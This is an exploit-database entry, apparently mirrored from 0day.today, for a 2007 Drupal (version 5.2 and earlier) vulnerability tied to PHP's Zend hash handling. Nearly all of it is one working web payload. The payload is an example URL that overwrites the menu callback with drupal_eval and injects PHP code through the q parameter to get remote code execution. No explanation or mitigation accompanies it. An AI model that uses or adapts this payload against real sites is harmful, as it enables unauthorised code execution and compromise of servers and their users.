id: 2213
date: 10/09/2007
title: Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector
author: ShAnKaR
cves: 

=============================================================
Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector
=============================================================



Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector

Example: http://www.example.com/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/<?phpinfo();



#  0day.today [2023-03-22]  #